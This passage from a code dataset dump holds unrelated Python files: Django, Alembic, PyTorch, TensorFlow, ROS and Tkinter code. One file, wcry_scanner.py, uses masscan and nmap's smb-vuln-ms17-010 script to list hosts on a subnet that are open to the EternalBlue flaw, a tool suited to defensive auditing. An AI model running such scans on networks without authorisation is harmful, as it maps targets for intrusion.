Tk()\n\nwindow.title('Jeka')\nwindow.geometry('480x360')\nwindow[\"bg\"] = \"white\"\n\nentry = Entry(window , width = 100)\nentry.grid(row=55, column=55, columnspan=55)\n\n","sub_path":"number 
in str (tkinter).py","file_name":"number in str (tkinter).py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"640055298","text":"\"\"\"empty message\n\nRevision ID: 5911f8b5419a\nRevises: \nCreate Date: 2021-01-14 15:09:11.421137\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '5911f8b5419a'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('oauth2_client',\n sa.Column('client_id', sa.String(length=48), nullable=True),\n sa.Column('client_secret', sa.String(length=120), nullable=True),\n sa.Column('client_id_issued_at', sa.Integer(), nullable=False),\n sa.Column('client_secret_expires_at', sa.Integer(), nullable=False),\n sa.Column('client_metadata', sa.Text(), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_oauth2_client_client_id'), 'oauth2_client', ['client_id'], unique=False)\n op.create_table('oauth2_code',\n sa.Column('code', sa.String(length=120), nullable=False),\n sa.Column('client_id', sa.String(length=48), nullable=True),\n sa.Column('redirect_uri', sa.Text(), nullable=True),\n sa.Column('response_type', sa.Text(), nullable=True),\n sa.Column('scope', sa.Text(), nullable=True),\n sa.Column('nonce', sa.Text(), nullable=True),\n sa.Column('auth_time', sa.Integer(), nullable=False),\n sa.Column('code_challenge', sa.Text(), nullable=True),\n sa.Column('code_challenge_method', sa.String(length=48), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('code')\n )\n op.create_table('oauth2_token',\n sa.Column('client_id', sa.String(length=48), nullable=True),\n sa.Column('token_type', sa.String(length=40), nullable=True),\n sa.Column('access_token', sa.String(length=255), nullable=False),\n sa.Column('refresh_token', sa.String(length=255), nullable=True),\n sa.Column('scope', sa.Text(), nullable=True),\n sa.Column('revoked', sa.Boolean(), nullable=True),\n sa.Column('issued_at', sa.Integer(), nullable=False),\n sa.Column('expires_in', sa.Integer(), nullable=False),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('access_token')\n )\n op.create_index(op.f('ix_oauth2_token_refresh_token'), 'oauth2_token', ['refresh_token'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.drop_index(op.f('ix_oauth2_token_refresh_token'), table_name='oauth2_token')\n    op.drop_table('oauth2_token')\n    op.drop_table('oauth2_code')\n    op.drop_index(op.f('ix_oauth2_client_client_id'), table_name='oauth2_client')\n    op.drop_table('oauth2_client')\n    # ### end Alembic commands ###\n","sub_path":"migrations/versions/5911f8b5419a_.py","file_name":"5911f8b5419a_.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"395181856","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan  3 23:28:52 2018\n\n@author: eric.benhamou, david sabbagh, valentin melot\n\"\"\"\n\nimport os.path\n\n# Image resolution\nDPI = 300\n\n\ndef delete_all_png_file():\n    for item in os.listdir('.'):\n        if item.endswith(\".png\"):\n            try:\n                os.remove(os.path.join(os.getcwd(), item))\n            except Exception as e:\n                print(e)  # Exception has no .message attribute in Python 3\n    return\n\n\ndef save_figure(plt, prefix, suffix, lgd=None):\n    filename = '{}_figure_{}.png'.format(prefix, suffix)\n    count = 1\n    while os.path.isfile(filename):\n        count = count + 1\n        filename = '{}_figure_{}({}).png'.format(prefix, suffix, count)\n    if lgd is not None:\n        plt.savefig(filename, bbox_extra_artists=(\n            lgd,), bbox_inches='tight', dpi=DPI)\n    else:\n        plt.savefig(filename, dpi=DPI)\n    plt.show(block=False)\n    print('saved figure as \\'{}\\''.format(filename))\n    return\n","sub_path":"backup/origin/cHMM-master/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"388277137","text":"'''\n\nSend an HTTP request over a socket and save the response to a file\n\n'''\n\nimport socket\nimport os\n\nss = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nss.connect(('14.215.177.38',80))\n\ndef send_http():\n    ss.send('GET / HTTP/1.1\\r\\nHost: www.baidu.com\\r\\n\\r\\n'.encode())\n    msg = ss.recv(10240)\n    return msg\n\ndef file_copy(msg):\n    load_copy = input('Enter a filename to save to: ')\n    load_copy += '.txt'\n    fp = open(load_copy,'w')\n    fp.write(msg.decode())\n    fp.close()\n\n    load = os.path.dirname(__file__) + '/{}'.format(load_copy)\n    print('Response saved to: {}'.format(load))\n\nxx = send_http()\nfile_copy(xx)\n\n","sub_path":"python_socket/homework2_server.py","file_name":"homework2_server.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"497261071","text":"num = 3\nif(num ==4):\n    print(\"correct\")\nelse:\n    print(\"you got to try again dude!\")\n    \nlist = [1, 2, 3, 4]\nfor i in range(0, len(list)):\n    print(list[i])\n\n\n","sub_path":"first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"338807272","text":"import pytest\n\nfrom pyp2rpm.extract_distribution import extract_distribution\n\n\nclass TestExtractDistribution(object):\n\n    @pytest.mark.parametrize(('var', 'expected'), [\n        (['pkg'], ['pkg']),\n        (None, []),\n        ('pkg >= 2.5\\npkg2', ['pkg >= 2.5', 'pkg2']),\n        (('pkg'), ['pkg']),\n        (('pkg',), ['pkg']),\n        ((p for p in ('pkg',)), ['pkg']),\n    ])\n    def test_list(self, var, expected):\n        assert extract_distribution._list(var) == expected\n","sub_path":"tests/test_extract_distribution.py","file_name":"test_extract_distribution.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"338545197","text":"import torch.nn as nn\nimport numpy 
as np\nfrom .base_network import NetworkBase\nimport torch\n\nclass CascadeLmkDectector(NetworkBase):\n\t\"\"\"docstring for CascadeLmkDectector\"\"\"\n\tdef __init__(self, in_channel_num=3):\n\t\tsuper(CascadeLmkDectector, self).__init__()\n\t\tself._name = 'cascade_lmk_detector'\n\n\t\tlayers = []\n\t\tlayers.append(nn.Conv2d(in_channel_num, 20, 4, 1, 0, bias=False)) # bn x in_chn x 128 x 128 -> bn x 20 x 125 x 125\n\t\tlayers.append(nn.MaxPool2d((2,2))) # bn x 20 x 125 x 125 -> bn x 20 x 62 x 62\n\t\tlayers.append(nn.Conv2d(20, 40, 3, 1, 0, bias=False)) # bn x 20 x 62 x 62 -> bn x 40 x 60 x 60\n\t\tlayers.append(nn.MaxPool2d((2,2))) # bn x 40 x 60 x 60 -> bn x 40 x 30 x 30\n\t\tlayers.append(nn.Conv2d(40, 60, 3, 1, 0, bias=False)) # bn x 40 x 30 x 30 -> bn x 60 x 28 x 28\n\t\tlayers.append(nn.MaxPool2d((2,2))) # bn x 60 x 28 x 28 -> bn x 60 x 14 x 14\n\t\tlayers.append(nn.Conv2d(60, 80, 2, 1, 0, bias=False)) # bn x 60 x 14 x 14 -> bn x 80 x 13 x 13\n\n\t\tself.conv = nn.Sequential(*layers)\n\t\tself.fc1 = nn.Linear(80*13*13, 120)\n\t\tself.fc2 = nn.Linear(120, 10) \n\n\t\t# #weight initialize\n\t\t# for m in self.modules():\n\t\t# \tif isinstance(m, nn.Conv2d):\n\t\t# \t\tm.weight.data.normal_(0, 0.02)\n\n\t\t# \telif isinstance(m, nn.ConvTranspose2d):\n\t\t# \t\tm.weight.data.normal_(0, 0.02)\n\n\t\t# \telif isinstance(m, nn.Linear):\n\t\t# \t\tm.weight.data.normal_(0, 0.02)\n\n\tdef forward(self, input):\n\t\tx = self.conv(input)\n\n\t\tx = x.view(-1, 80*13*13)\n\n\t\tx = self.fc1(x)\n\n\t\tx = x.view(-1, 120)\n\n\t\tx = self.fc2(x)\n\n\t\treturn x ","sub_path":"networks/cascade_lmk_detector.py","file_name":"cascade_lmk_detector.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"459587069","text":"# pylint: disable=duplicate-code\n\"\"\"\nProgramming for linguists\n\nImplementation of the data structure \"Queue\" from stack\n\"\"\"\n\nfrom stack.stack import Stack\nfrom queue_.queue_ import TooManyElementsInQueueError, TypeCapacityError, QueueIsFullError\n\n\n# pylint: disable=invalid-name\nclass Queue_:\n \"\"\"\n Queue Data Structure\n \"\"\"\n\n def __init__(self, data: Stack = Stack(), capacity: int = 0):\n if not isinstance(data, Stack):\n raise TypeError\n\n if not isinstance(capacity, int):\n raise TypeCapacityError\n\n self._q_capacity = capacity\n\n if data.size() > self._q_capacity and data.size() and self._q_capacity:\n raise TooManyElementsInQueueError\n self.data = data\n\n def put(self, element):\n \"\"\"\n Add the element ‘element’ at the end of queue_\n :param element: element to add to queue_\n \"\"\"\n if self.full():\n raise QueueIsFullError\n\n return self.data.push(element)\n\n def get(self):\n \"\"\"\n Remove and return an item from queue_\n \"\"\"\n if self.empty():\n raise IndexError\n\n tmp_stack = Stack()\n while self.data.data:\n tmp_stack.push(self.data.top())\n self.data.pop()\n top_item = tmp_stack.top()\n tmp_stack.pop()\n while tmp_stack.data:\n self.data.push(tmp_stack.top())\n tmp_stack.pop()\n\n return top_item\n\n def empty(self) -> bool:\n \"\"\"\n Return whether queue_ is empty or not\n :return: True if queue_ does not contain any elements.\n False if the queue_ contains elements\n \"\"\"\n return self.data.empty()\n\n def size(self) -> int:\n \"\"\"\n Return the number of elements in queue_\n :return: Number of elements in queue_\n \"\"\"\n return self.data.size()\n\n def top(self):\n \"\"\"\n Return the element on the top of queue_\n :return: the 
element that is on the top of queue_\n \"\"\"\n if self.empty():\n raise IndexError\n\n tmp_stack = Stack()\n while self.data.data:\n tmp_stack.push(self.data.top())\n self.data.pop()\n top_item = tmp_stack.top()\n while tmp_stack.data:\n self.data.push(tmp_stack.top())\n tmp_stack.pop()\n\n return top_item\n\n def capacity(self):\n \"\"\"\n Return the capacity of queue_\n :return: the number of elements which can be in queue_\n \"\"\"\n return self._q_capacity\n\n def full(self):\n \"\"\"\n Return whether queue_ is full or not\n :return: True if queue_ is full.\n False if the queue_ is not full\n \"\"\"\n if not self._q_capacity:\n return False # if capacity == 0, the queue_ is infinite\n\n if self._q_capacity and self.size() == self._q_capacity:\n return True\n\n return False\n","sub_path":"queue_/queue_from_stack.py","file_name":"queue_from_stack.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"70238063","text":"string = input(\"Express your thoughts verbally: \")\n\nall_vowels = \"aeiouyAEIOUY\"\nvowel_counter = 0\n\nfor ch in string:\n if ch in all_vowels:\n vowel_counter += 1\n\nprint(\"The amount of vowels used in your expressed thoughts equals: \" + str(vowel_counter))\n","sub_path":"Week2/4-Three-More-Problems/count_vowels.py","file_name":"count_vowels.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"439555401","text":"# coding=utf-8\nfrom django.conf.urls import url,include\nfrom blogs.views import BlogList, BlogDetail, PostDetail, CreateBlog, UpdateBlog, CreatePost, UpdatePost, UpdateBlogDiv, UpdatePostDiv, \\\nLikeCountView, LikeView, CategoryView, PostLikeAjaxView, PostCommentDetail\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\n\n\nurlpatterns = [\n url(r'^$', BlogList.as_view(), name=\"blog_list\"),\n url(r'^newblog/',login_required(CreateBlog.as_view()), name=\"addblog\"),\n url(r'^(?P<pk>\d+)/edit/$', login_required(UpdateBlog.as_view()), name=\"editblog\"),\n url(r'^(?P<pk>\d+)/$', BlogDetail.as_view(), name=\"blogDetail\"),\n url(r'^posts/(?P<pk>\d+)/$', PostDetail.as_view(), name=\"postDetail\"),\n\nurl(r'^ckeditor/', include('ckeditor_uploader.urls'), name=\"meow\"),\n url(r'^newpost/',login_required(CreatePost.as_view()), name=\"addpost\"),\n url(r'^posts/(?P<pk>\d+)/edit/$', login_required(UpdatePost.as_view()), name=\"editpost\"),\n url(r'^(?P<pk>\d+)/editdiv/$', login_required(UpdateBlogDiv.as_view()), name=\"editblogdiv\"),\n url(r'^posts/(?P<pk>\d+)/editdiv/$', login_required(UpdatePostDiv.as_view()), name=\"editpostdiv\"),\n url(r'^posts/(?P<pk>\d+)/likes/$', csrf_exempt(PostLikeAjaxView.as_view()), name=\"likecount\"),\n url(r'^posts/likes/$', LikeView.as_view(), name=\"likes\"),\n url(r'^posts/(?P<pk>\d+)/comments/$', PostCommentDetail.as_view(), name=\"commentdiv\"),\n\n\n]\n\n\n","sub_path":"blogs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"450694760","text":"\"\"\"trains the neural network\"\"\"\n\nfrom neural_network import *\nfrom database_creator import *\n\n\ninput = load_input_with_shuffle(r\"C:\\\Users\\\Antonio\\\Documents\\\Projet_Audi_Cup\\\Reconnaissance_STOP\\\panneaux_traites_entrainement\")\n# print(input.shape[0])\ninput_matrix = input[:(input.shape[0]-1),:]\nexperimental_input = 
input[input.shape[0]-1::input.shape[0]]\n# print(input_matrix.shape)\n# print(experimental_input)\nm = input_matrix.shape\nNN1 = Nnetwork([m[0],30,30,30,30,30,1],[sigmoid,sigmoid,sigmoid,sigmoid,sigmoid,sigmoid])\n\n\n\ndef trains_neural(input_matrix,experimental_matrix,NN):\n NN.epoch(input_matrix,experimental_matrix)\n\n\n\ntrains_neural(input_matrix,experimental_input,NN1)\n\n\ntest_images = load_input_with_shuffle(r\"C:\\\Users\\\Antonio\\\Documents\\\Projet_Audi_Cup\\\Reconnaissance_STOP\\\panneaux_traites_test\")\n# print(test_images.shape[0])\ntest_matrix = test_images[:(test_images.shape[0]-1),:]\n\ntest_output = test_images[test_images.shape[0]-1::test_images.shape[0]]\n\n\n\ndef test_accuracy(NN,test_images,result):\n A = NN.forward_propagation(test_images,result)[0]\n # print(A)\n score = 0\n for i in range(A.shape[1]):\n x = result[0,i]\n\n if A[0,i]>=0.5:\n y = 1\n else:\n y = 0\n if x == y:\n score+=1\n print(A[0,i])\n print(x,y)\n return score/A.shape[1]*100\n\nprint(test_accuracy(NN1,test_matrix,test_output))\n\n","sub_path":"Programmes_NN/neural_network_training.py","file_name":"neural_network_training.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"637535470","text":"import matplotlib.pyplot as plt\nimport random\n\nk = 10**3\n\nx = [i for i in range(k)]\ny = [1]\nz = [1.0583**i for i in x]\n\nm = 1\nfor i in range(k-1):\n temp = random.choice([1,0])\n if temp == 1:\n m *= 1.4\n else:\n m *= 0.8\n y.append(m)\n\n\nplt.yscale('log')\nplt.grid(True)\nplt.plot(x,y,'x')\nplt.plot(x,z)\nplt.show()\n","sub_path":"stockprice.py","file_name":"stockprice.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"600955273","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets\n\n\"\"\"\nPurpose: Use logistic regression to classify mnist dataset\nOptimizer: GradientDescentOptimizer\nLearning Rate: 0.003\nAchieved test accuracy: 92.6%\n\"\"\"\n\n# Get the data\nmnist = read_data_sets(\"data\", one_hot=True, validation_size=0, reshape=True)\n\n# Define placeholders for the training and test data\nX = tf.placeholder(dtype=tf.float32, shape=[None, 28*28])\ny_true = tf.placeholder(dtype=tf.float32, shape=[None, 10])\n\n# Define variables needed for weights and biases\nW = tf.Variable(tf.zeros([28*28, 10]))\nb = tf.Variable(tf.zeros([10]))\n\n# Define logit\ny_hat = tf.add(tf.matmul(X, W), b)\n\n# Define the cost function\ncost = tf.nn.softmax_cross_entropy_with_logits(logits=y_hat, labels=y_true)\n\n# Define accuracy\ncorrect_prediction = tf.equal(tf.argmax(tf.sigmoid(y_hat), axis=1),\n tf.argmax(tf.cast(y_true, dtype=tf.float32), axis=1))\nacc = tf.reduce_mean(tf.cast(correct_prediction, dtype=tf.float32))\n\n# Define optimizer\ntrain_step = tf.train.GradientDescentOptimizer(learning_rate=0.003).minimize(cost)\n\n# Define operator to initialize variables\ninit_op = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init_op)\n for i in range(10000):\n X_batch, y_batch = mnist.train.next_batch(100)\n sess.run(train_step,\n feed_dict={\n X: X_batch,\n y_true: y_batch\n })\n test_acc = sess.run(acc,\n feed_dict={\n X: mnist.test.images,\n y_true: mnist.test.labels\n })\n print(\"test accuracy = 
{0}\".format(test_acc))","sub_path":"mnist_logistic.py","file_name":"mnist_logistic.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"157060510","text":"import lasagne\nfrom lasagne.layers import InputLayer, DenseLayer, DropoutLayer, LSTMLayer\n\n\ndef create_network(config, BATCH_SIZE):\n input_dim = config['input_dim']\n num_labels = config['num_labels']\n input_layer = InputLayer(shape=(BATCH_SIZE, input_dim // 2, 2))\n input_var = input_layer.input_var\n hidden_layer_1 = LSTMLayer(input_layer, 100)\n hidden_layer_2 = LSTMLayer(hidden_layer_1, 50, only_return_final=True)\n output_layer = DenseLayer(hidden_layer_2,\n num_units=num_labels,\n nonlinearity=lasagne.nonlinearities.softmax)\n return locals()\n","sub_path":"trainNN/out/v036-online-lstm-dirty/network_model.py","file_name":"network_model.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"107114063","text":"#!/usr/bin/env python\nfrom time import sleep\n\nimport rospy\n\nimport tf2_ros\nfrom tf2_geometry_msgs import do_transform_point\nfrom geometry_msgs.msg import PointStamped\n\n\nif __name__ == '__main__':\n rospy.init_node('get_odom_point', anonymous=True)\n\n tf_buffer = tf2_ros.Buffer()\n tf_listener = tf2_ros.TransformListener(tf_buffer)\n sleep(5)\n now = rospy.Time.now()\n transform = tf_buffer.lookup_transform('odom', 'base_link', now, rospy.Duration(10))\n robot = PointStamped()\n robot.header.stamp = now\n robot.header.frame_id = 'base_link'\n robot.point.x = 0\n robot.point.y = 0\n\n robot = do_transform_point(robot, transform)\n print(\"[{}, {}]\".format(robot.point.x, robot.point.y))\n","sub_path":"src/magellan_core/scripts/get_odom_point.py","file_name":"get_odom_point.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"155257794","text":"#!/usr/bin/env python3\n\"\"\"\nUsage:\n wcry_scanner.py (--subnet=<subnet>) (--outfile=<outfile>)\n\nOptions:\n --subnet=<subnet> Subnet to scan example: 192.168.0.0/24\n --outfile=<outfile> Absolute path to output file example: /home/user/rhosts.log\n\"\"\"\nimport logging\n\nlogging.basicConfig(\n format='%(asctime)s - %(levelname)s - %(message)s', \n level=logging.DEBUG, \n handlers=[\n logging.FileHandler(filename=\"wcry_scanner.log\", mode=\"w+\"),\n logging.StreamHandler()\n ]\n )\n\nimport os\nimport docopt\nimport masscan\nimport nmap\n\nfrom datetime import datetime\n\n\ndef gather_cli_options() -> dict:\n \"\"\"\n Return a dictionary with our docopt command line options.\n\n Args:\n None\n\n Returns:\n A dictionary containing the values provided by docopt via command line arguments\n \"\"\"\n logging.info(\"Entering gather_cli_options\")\n opts = docopt.docopt(__doc__)\n subnet = opts['--subnet']\n outfile = opts['--outfile']\n logging.info(\"CLI options gathered: {}\".format(opts))\n return {\"subnet\": subnet, \"outfile\": outfile}\n\n\ndef run_masscan(subnet: str) -> list:\n \"\"\"\n Run masscan against a subnet to quickly return a list of IPs with open port 445.\n\n Args:\n subnet: A subnet to scan\n\n Returns:\n A list of IPv4 addresses that report TCP port 445 as open by masscan\n\n Note:\n Masscan command: masscan -oX - -p 445\n \"\"\"\n logging.info(\"Entering run_masscan\")\n rhosts_open_445 = []\n\n try:\n my_scanner = masscan.PortScanner()\n except masscan.PortScannerError as ex:\n 
logging.debug(\"MASSCAN not installed to OS path: {}\".format(str(ex)))\n os._exit(1)\n \n logging.info(\"Begin masscan against subnet: {}\".format(subnet))\n try:\n my_scanner.scan(subnet, ports='445')\n scan_results = my_scanner.scan_result['scan']\n except masscan.PortScannerError as ex:\n logging.debug(\"The masscan requires root privileges, run with sudo\")\n os._exit(1)\n except KeyError as ex:\n logging.debug(\"Masscan results do not contain scan data: {}\".format(str(ex)))\n os._exit(1)\n\n for host in my_scanner.all_hosts:\n try:\n if scan_results[host]['tcp'][445]['state'] == 'open':\n rhosts_open_445.append(host)\n except KeyError as ex:\n logging.debug(\"Port 445 closed on: {}\".format(host))\n pass\n\n logging.debug(\"Hosts with open 445: {}\".format(rhosts_open_445))\n return rhosts_open_445\n\n\ndef run_nmap(rhosts_open_445: list) -> list:\n \"\"\"\n Nmap scan against returned list of IPs from masscan.\n\n Args:\n rhosts_open_445: List of hosts with TCP port 445 open\n\n Returns:\n A list of IPv4 addresses that report TCP port 445 as vulnerable to eternalblue by nmap\n\n Note:\n Nmap command: nmap -p445 --script smb-vuln-ms17-010 \n \"\"\"\n logging.info(\"Entering run_nmap\")\n rhosts_ms17_vuln = []\n rhosts_list_str = ' '.join(rhosts_open_445)\n \n try:\n logging.info(\"Setting up nmap scanner\")\n my_scanner = nmap.PortScanner()\n except nmap.nmap.PortScannerError as ex:\n logging.debug(\"NMAP not installed to OS path: {}\".format(str(ex)))\n os._exit(1)\n \n try:\n logging.info(\"Begin nmap scan against IP list: {}\".format(rhosts_open_445))\n full_results = my_scanner.scan(hosts=rhosts_list_str, arguments='-Pn -p445 --script smb-vuln-ms17-010')\n scan_results = full_results['scan']\n except nmap.nmap.PortScannerError as ex:\n logging.debug(\"The nmap scan requires root privileges, run with sudo\")\n os._exit(1)\n except KeyError as ex:\n logging.debug(\"Results do not contain scan data: {}\".format(str(ex)))\n os._exit(1)\n\n for host in my_scanner.all_hosts():\n try:\n if 'State: VULNERABLE' in scan_results[host]['hostscript'][0]['output']:\n logging.info(\"Host vulnerable: {}\".format(host))\n rhosts_ms17_vuln.append(host)\n except:\n # Should we save not vuln to a separate file?\n logging.info(\"Host not vulnerable: {}\".format(host))\n pass\n return rhosts_ms17_vuln\n\n\ndef results_to_file(data: list, outfile: str) -> str:\n \"\"\"\n Write the results to a file.\n\n Args:\n data: The data to write to the outfile\n outfile: The absolute path for the outfile of results\n\n Returns:\n The absolute path where the outfile is written containing all vulnerable IPs\n \"\"\"\n logging.info(\"Entering results_to_file\")\n logging.debug(\"Creating new outfile {}\".format(outfile))\n with open(outfile, \"w+\") as file:\n for ip in data:\n file.write(\"{}\\n\".format(ip))\n file.close()\n logging.info(\"Results file: {}\".format(outfile))\n return outfile\n\n\ndef main():\n \"\"\"\n Main function to run script.\n \"\"\"\n startTime = datetime.now()\n logging.info(\"Running wcry_scanner\")\n cli_options = gather_cli_options()\n rhosts_open_445 = run_masscan(cli_options['subnet'])\n rhosts_ms17_vuln = run_nmap(rhosts_open_445)\n results_to_file(rhosts_ms17_vuln, cli_options['outfile'])\n logging.info(\"Completion time: {}\".format(datetime.now() - startTime))\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"wcry_scanner.py","file_name":"wcry_scanner.py","file_ext":"py","file_size_in_byte":5323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"523607672","text":"from sklearn import svm\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport csv\n\ndef outputfunc(input):\n\t#Random circle around -1,-1\n\trand_rad = np.random.rand()\n\treturn rand_rad*np.cos(input), rand_rad*np.sin(input)\n\ndef circ_func(run,theta):\n\tx,y = outputfunc(theta)\n\t#Random circle around 1,1\n\trun.x.append(x+1.1)\n\trun.y.append(y-1.1)\n\ndef circ_func2(run,theta):\n\tx,y = outputfunc(theta)\n\t#Random circle around 1,1\n\trun.x.append(x-1.1)\n\trun.y.append(y+1.1)\n\nclass DataRun():\n\tdef __init__(self):\n\t\tself.x = []\n\t\tself.y = []\t\t\n\ntheta = np.linspace(0,2*np.pi)\nrun1 = DataRun()\nrun2 = DataRun()\nrun3 = DataRun()\nrun4 = DataRun()\nrun5 = DataRun()\n\nrun6 = DataRun()\nrun7 = DataRun()\nrun8 = DataRun()\nrun9 = DataRun()\nrun10 = DataRun()\n\nfor i in theta:\n\tcirc_func(run1,i)\n\tcirc_func(run2,i)\n\tcirc_func(run3,i)\n\tcirc_func(run4,i)\n\tcirc_func(run5,i)\n\n\tcirc_func2(run6,i)\n\tcirc_func2(run7,i)\n\tcirc_func2(run8,i)\n\tcirc_func2(run9,i)\n\tcirc_func2(run10,i)\n\nplt.plot(run1.x,run1.y, 'ro')\nplt.plot(run2.x,run2.y, 'ro')\nplt.plot(run3.x,run3.y, 'ro')\nplt.plot(run4.x,run4.y, 'ro')\nplt.plot(run5.x,run5.y, 'ro')\n\nplt.plot(run6.x,run6.y, 'bo')\nplt.plot(run7.x,run7.y, 'bo')\nplt.plot(run8.x,run8.y, 'bo')\nplt.plot(run9.x,run9.y, 'bo')\nplt.plot(run10.x,run10.y, 'bo')\nplt.show()\n\nruns = []\nruns.append(run1)\nruns.append(run2)\nruns.append(run3)\nruns.append(run4)\nruns.append(run5)\nruns.append(run6)\nruns.append(run7)\nruns.append(run8)\nruns.append(run9)\nruns.append(run10)\n\nwith open('data_b.csv','a+',newline ='') as csvfile:\n\tcsvwriter = csv.writer(csvfile, delimiter=',', quotechar = '|', quoting=csv.QUOTE_MINIMAL)\n\tfor i in range(len(runs)):\n\t\tfor j in range(len(runs[i].x)):\n\t\t\tcsvwriter.writerow([runs[i].x[j], runs[i].y[j], 0])","sub_path":"lab10_2021/svm/make_data_1b.py","file_name":"make_data_1b.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"263864390","text":"from django.template import Context, loader\nfrom django.views.decorators.http import require_GET, require_http_methods\nfrom django.http import HttpResponse\nfrom django.conf import settings\nimport urllib3\n#from django.conf.urls.defaults import *\n\n@require_GET\ndef search(request):\n \"\"\"The default full text search page.\"\"\"\n template = loader.get_template('search.html')\n content = Context({})\n return HttpResponse(template.render(content))\n\n\n@require_http_methods([\"GET\", \"POST\"])\ndef proxy(request):\n \"\"\"Proxy connection to \"\"\"\n full_url = request.get_full_path()\n http = urllib3.PoolManager()\n url = settings.PROXY_BASE_URL + full_url.replace(\"/elasticsearch/\", \"\")\n content_type = {'Content-Type':request.META.get('CONTENT_TYPE')}\n response = http.request(request.method, url, headers=content_type, body=request.body)\n r_type = response.getheader('content-type')\n r_data = response.data\n r_status = response.status\n return HttpResponse(content=r_data, content_type=r_type, 
status=r_status)","sub_path":"onionDjangoSearch/onionsearch/onionsearch/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"56240681","text":"import tkinter as Tk\n\nclass SliderFrame(Tk.Canvas):\n #pass in: network, draw_plot, image_selection\n def __init__(self,parent,callback):\n Tk.Canvas.__init__(self,parent,bg='white')\n \n #parent.bind('<Up>',self.up)\n #parent.bind('<Down>',self.down)\n \n self.parent=parent\n self.box=None\n \n self.slider_state=False\n self.slider_position=20\n self.values={'cur':6.1,\n 'min':0.1,\n 'max':12.1,\n 'step':0.1,\n 'unit':'pF'}\n\n self.callback=callback\n \n self.snap_pixels=(self.values['max']-self.values['min'])/self.values['step']/400\n\n #print self.snap_pixels\n self.highvar = Tk.StringVar()\n self.elemvar = Tk.StringVar()\n self.lowvar = Tk.StringVar()\n \n self.canvas1 = Tk.Canvas(width=200, height=500)\n self.canvas1.configure(background='white')\n self.canvas1.grid(row=1,column=0,stick=Tk.N)#(expand=1, fill=Tk.BOTH)\n\n self.canvas1.create_line(50,50,50,450,width=4,fill='#777')\n self.slider=self.canvas1.create_line(40,250,60,250,width=10,fill='#228')\n\n self.entry_high=Tk.Entry(self.canvas1, width=6, bg=self.canvas1['bg'], textvariable=self.highvar, justify='center',state='readonly')\n self.entry_high.bind('<Return>',self.update_slider)\n \n self.canvas1.create_window(50,25,window=self.entry_high)\n self.valuetext=self.canvas1.create_text(90,250, text=self.elemvar.get())\n self.entry_low=Tk.Entry(self.canvas1, width=6, bg=self.canvas1['bg'], textvariable=self.lowvar, justify='center',state='readonly')\n self.entry_low.bind('<Return>',self.update_slider)\n \n self.canvas1.create_window(50,475,window=self.entry_low)\n\n self.canvas1.update()\n 